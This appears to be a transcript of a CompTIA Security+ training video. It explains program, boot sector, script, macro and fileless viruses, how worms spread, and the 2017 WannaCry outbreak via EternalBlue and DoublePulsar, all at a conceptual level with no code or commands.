Viruses and Worms – SY0-601 CompTIA Security+ : 1.2

A computer virus can cause significant problems on a system. In this video, you’ll learn about viruses, fileless viruses, and how worms can be used to infect other systems without any human intervention.

<< Previous Video: An Overview of Malware Next: Ransomware and Crypto-malware >>



A virus is malware that can reproduce itself, but one of the unique characteristics of a virus is that it needs you– the end user– to click on or launch that application to start the virus replication process. This is something that differentiates a virus from a worm. The virus needs a human being to start the process, whereas a worm can jump from machine to machine without any human intervention whatsoever. Once the end user has launched the executable that starts the virus, it can use the existing file system or the network to replicate itself.

What happens next depends on the virus itself. Some viruses are very malicious– can delete files, can encrypt your data, and can cause some serious problems on your computer– whereas other viruses may be relatively benign. They may simply put advertising on your screen, or they may be simply gathering information from your computer, and you may have no idea the virus is even installed. This is one of the main reasons we keep antivirus software running on our computers. It’s able to recognize when a virus is starting, and then it can stop the virus before it begins to execute.

It’s always important to keep our signatures updated so our antivirus software can recognize and stop these viruses from executing. We tend to put viruses into different categories. One of the most common virus types is a program virus, whereas the virus is part of an application that is running, and you clicking on that application– or launching that application– is what causes the virus to execute on your system.

A relatively rare virus these days is a boot sector virus. This is a virus that exists in the boot sector of your storage device, and when you start your computer, the virus itself is launched. All you have to do is start the operating system, and the virus is started, along with the boot sector. Some viruses operate as scripts on your system. They may operate as a script in the operating system, or they might be a script that runs inside of your browser.

Another type of virus that’s very similar to a script virus is a macro virus. A macro virus is usually running inside of another application. These are commonly associated with Microsoft Office apps. A newer style of virus is a fileless virus. It is a virus that never installs itself or saves itself as a file on your file system. This is a method that the virus uses to try to avoid some of the techniques that the antivirus software uses, especially if the antivirus software is looking at what you save to a storage drive.

If the virus is never saving itself to the storage drive, then it may be able to evade the antivirus software. Instead of existing as a file that might execute, the fileless virus operates solely in the memory of the computer. Once it’s started, all of the operations happen inside of RAM, and nothing is ever written to the storage drive on your system. A common way to execute a fileless virus is to click a link on a website or click a link that’s inside of an email. This will then download software that will run as a Flash file, a Java file, or perhaps it takes advantage of a Windows vulnerability to begin executing.

These vulnerabilities in Flash, or Java, or Windows might allow a script to be run in PowerShell, for example. PowerShell would then download the virus from a third-party website and then execute that virus in the memory of your local computer. Once this virus is executing in the memory of your system, it can encrypt files, it can delete information, it can exfiltrate data, and do anything else that you as an end user may have access to run on that computer. And, since the virus writers would like to have this fileless virus execute again later, they might even change your registry so that this entire process can start itself all over again every time you boot your computer.

As we mentioned earlier, a traditional virus requires an end user to click on an executable and start the process, but a type of virus that doesn’t need any type of user intervention is a worm. A worm takes advantage of a vulnerability in operating systems or applications to be able to move itself from system to system without requiring any type of user intervention. Worms take advantage of the connectivity we have on our local networks and our internet-connected systems to be able to move very quickly and very easily from computer to computer.

These worms are so good at propagating themselves that it’s not unusual for hundreds of thousands or even millions of systems to be infected in a very short period of time. Once the worm has been identified, and a signature has being created, we can usually stop the propagation of the worm at the firewall or the IPS. This obviously requires that we know the worm exists and that we can create a signature for it, and it also requires that you’re able to put a firewall or an IPS in place between two systems so that you can block that flow of communication.

A major worm infestation occurred on Friday, May the 12th of 2017. This is the WannaCry worm. This worm not only propagated itself automatically– because it was a worm– but it also was very destructive because it installed crypto malware and began encrypting people’s personal files. This started with a system that was already infected, and it began looking for other vulnerable systems. This worm took advantage of a vulnerability in Microsoft Server Message Block version 1– or SMB v1– and it used an exploit called EternalBlue to be able to find other systems that are on the network and then infect those systems.

Once another vulnerable system was identified by the EternalBlue worm, then it installed a backdoor application called DoublePulsar. DoublePulsar then downloaded the WannaCry ransomware and began encrypting the files on the person’s computer. This process then automatically began again. The worm was able to propagate itself from computer to computer without needing any type of human intervention.